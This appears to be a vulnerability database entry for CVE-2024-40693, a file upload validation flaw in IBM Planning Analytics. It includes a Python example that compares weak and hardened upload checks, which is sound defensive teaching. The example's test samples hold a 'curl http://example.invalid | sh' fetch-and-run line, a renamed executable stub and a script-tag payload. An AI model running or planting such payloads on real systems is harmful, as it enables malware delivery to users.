Cyber Posture

CVE-2024-40693

High

Published: 24 January 2025

Modified: 05 March 2025
KEV Added
Patch
CVSS Score: 8.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.0016 (36.5th percentile)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

IBM Planning Analytics 2.0 and 2.1 could be vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. Attackers can make use of this weakness and upload malicious executable files into the system, which can then be sent to a victim to perform further attacks.

Security Summary

IBM Planning Analytics versions 2.0 and 2.1 are affected by CVE-2024-40693, a vulnerability stemming from inadequate validation of file content uploaded through the web interface. This unrestricted upload of files with dangerous types, mapped to CWE-434, enables attackers to introduce malicious executable files into the system. The issue carries a CVSS v3.1 base score of 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H), indicating high severity due to its potential for significant impact across confidentiality, integrity, and availability.

Exploitation requires an authenticated account with low privileges (PR:L) that can reach the web interface over the network (AV:N, AC:L). Because the application does not inspect the content of what is uploaded, such an account can store an executable under a name or type the application accepts. The high impact ratings (C:H/I:H/A:H) are realised only when a victim retrieves and runs the file, which is why the vector carries UI:R; the scope is unchanged (S:U), so the impact is scored against the affected component rather than a separate authority. In effect the weakness turns a trusted business application into a distribution point for malware aimed at its own users. The EPSS score of 0.0016 (36.5th percentile) indicates a low predicted probability of exploitation in the wild at the time of scoring, so the CVSS base score rather than observed exploitation is what drives the High rating here.
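The following is an added example that illustrates the CWE-434 pattern the description names; it is not IBM code and does not reflect how Planning Analytics handles uploads. It places an extension-only check (the weak pattern) beside a content-aware check that sniffs executable signatures and verifies that the bytes match what the extension claims. The allowlist, the expected file types and the sample uploads are constructed assumptions for the demonstration.

```python
"""Content-aware upload validation beside the extension-only check that
CWE-434 describes. Added example; not IBM code and not Planning Analytics logic."""
import io
import re
import zipfile

# Hypothetical allowlist for a planning/reporting web app (an assumption, not IBM's).
ALLOWED_EXTENSIONS = {"csv", "txt", "xlsx", "pdf"}

# Leading bytes of executable formats that must never be stored, whatever the name says.
EXECUTABLE_SIGNATURES = (
    (b"MZ", "Windows PE executable"),
    (b"\x7fELF", "ELF executable"),
    (b"\xfe\xed\xfa\xce", "Mach-O executable"),   # 32-bit, big-endian magic
    (b"\xce\xfa\xed\xfe", "Mach-O executable"),   # 32-bit, little-endian magic
    (b"\xfe\xed\xfa\xcf", "Mach-O executable"),   # 64-bit, big-endian magic
    (b"\xcf\xfa\xed\xfe", "Mach-O executable"),   # 64-bit, little-endian magic
    (b"\xca\xfe\xba\xbe", "Mach-O fat binary or Java class"),
    (b"#!", "script with shebang"),
)

# Exactly one dot, alphanumeric start, no path separators: rules out traversal
# ("../x.csv"), dotfiles and double extensions ("shell.php.csv").
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,119}\.[A-Za-z0-9]{1,8}$")


def vulnerable_check(filename, data):
    """Extension-only check: the pattern the advisory describes. The content is
    never inspected, so a renamed executable passes."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXTENSIONS


def _is_plain_text(data):
    # NUL bytes or invalid UTF-8 are typical of binaries masquerading as text.
    if b"\x00" in data:
        return False
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


def _is_xlsx(data):
    # An .xlsx is an OOXML zip: require a parseable zip with the workbook part,
    # and refuse the macro-enabled layout (vbaProject.bin) regardless of extension.
    if not data.startswith(b"PK\x03\x04"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    if any(n.lower().endswith("vbaproject.bin") for n in names):
        return False
    return "xl/workbook.xml" in names


CONTENT_CHECKS = {
    "csv": _is_plain_text,
    "txt": _is_plain_text,
    "xlsx": _is_xlsx,
    "pdf": lambda d: d.startswith(b"%PDF-"),
}


def hardened_check(filename, data):
    """Return (accepted, reason). Accept only when the name is sane, the extension
    is allowlisted, the content carries no executable signature, and the content
    is what the extension claims."""
    if not SAFE_NAME.match(filename):
        return False, "unsafe filename"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    for magic, label in EXECUTABLE_SIGNATURES:
        if data.startswith(magic):
            return False, f"content is a {label}"
    if not CONTENT_CHECKS[ext](data):
        return False, f"content does not match .{ext}"
    return True, "ok"


def _build_xlsx():
    # Minimal OOXML-shaped zip, constructed here as sample input.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()


# Constructed sample uploads (not files from the advisory).
SAMPLES = {
    "q1_forecast.csv": b"region,revenue\nEMEA,1200\n",
    "budget.xlsx": _build_xlsx(),
    "report.csv": b"MZ\x90\x00" + b"\x00" * 60,                    # PE stub renamed to .csv
    "notes.txt": b"#!/bin/sh\ncurl http://example.invalid | sh\n",  # script renamed to .txt
    "summary.pdf": b"<html><script>alert(1)</script></html>",       # HTML, not a PDF
    "tool.exe": b"MZ\x90\x00",
}


def run_samples():
    """Map each sample to (extension-only verdict, content-aware verdict)."""
    return {name: (vulnerable_check(name, data), hardened_check(name, data)[0])
            for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in run_samples().items():
        print(f"{name:18} extension-only={str(naive):5} content-aware={hardened}")
```

Running the block shows the gap the advisory describes: every renamed executable or mismatched file that the extension-only check accepts is rejected by the content-aware check, while the genuine CSV and workbook still pass. Content checks are only one layer; a practitioner would also store uploads outside the web root under server-generated names, serve them back with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`, and scan them, because plain-text checks cannot tell a harmless CSV from one carrying formula injection.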

IBM has issued a security advisory at https://www.ibm.com/support/pages/node/7168387, which provides details on the vulnerability and recommended mitigations or patches for affected versions.

Details

CWE(s): CWE-434

Affected Products

Vendor: IBM
Product: Planning Analytics
Versions: 2.0, 2.1

References